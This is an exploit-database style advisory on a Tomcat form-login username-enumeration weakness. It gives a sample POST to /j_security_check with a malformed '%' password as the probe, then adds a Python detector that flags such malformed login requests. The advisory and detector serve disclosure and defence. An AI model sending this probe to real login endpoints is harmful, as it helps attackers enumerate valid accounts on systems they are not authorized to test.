
# Title : Apache Tomcat Form Authentication Username Enumeration Weakness
# Published : 2009-11-09
# Author : D. Matscheko


Attackers can use readily available tools to exploit this issue.

The following example POST data is available:

POST /j_security_check HTTP/1.1
Host: www.example.com

j_username=tomcat&j_password=%
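
The j_password value in the sample request is a lone `%`, which is not a valid percent escape. As an added example (not part of the original entry), the following check flags form-login POST bodies whose j_username or j_password carries a malformed percent escape, so such requests can be logged or rejected before they reach the application; the function name and the sample requests are constructed for illustration.

```python
import re

# A valid percent escape is '%' followed by exactly two hex digits.
_BAD_ESCAPE = re.compile(r"%(?![0-9A-Fa-f]{2})")
# Form-login fields named in the sample request above.
_LOGIN_FIELDS = ("j_username", "j_password")


def malformed_login_fields(raw_request: str) -> list[str]:
    """Return the form-login fields whose raw value has a broken percent escape.

    Only POSTs whose path ends in /j_security_check are inspected; the body
    is examined before any URL-decoding so the malformed bytes are still visible.
    """
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2 or request_line[0].upper() != "POST":
        return []
    # Drop any query string or ;jsessionid path parameter before matching.
    path = request_line[1].split("?", 1)[0].split(";", 1)[0]
    if not path.endswith("/j_security_check"):
        return []
    flagged = []
    for pair in body.strip().split("&"):
        name, _, value = pair.partition("=")
        if name in _LOGIN_FIELDS and _BAD_ESCAPE.search(value):
            flagged.append(name)
    return flagged


# Constructed sample requests (www.example.com is a placeholder host).
SAMPLE_MALFORMED = (
    "POST /j_security_check HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "\r\n"
    "j_username=tomcat&j_password=%"
)
SAMPLE_WELL_FORMED = (
    "POST /app/j_security_check HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "\r\n"
    "j_username=alice&j_password=p%40ss%25word"
)

if __name__ == "__main__":
    for label, req in (("malformed", SAMPLE_MALFORMED), ("well-formed", SAMPLE_WELL_FORMED)):
        print(label, "->", malformed_login_fields(req) or "no malformed escapes")
```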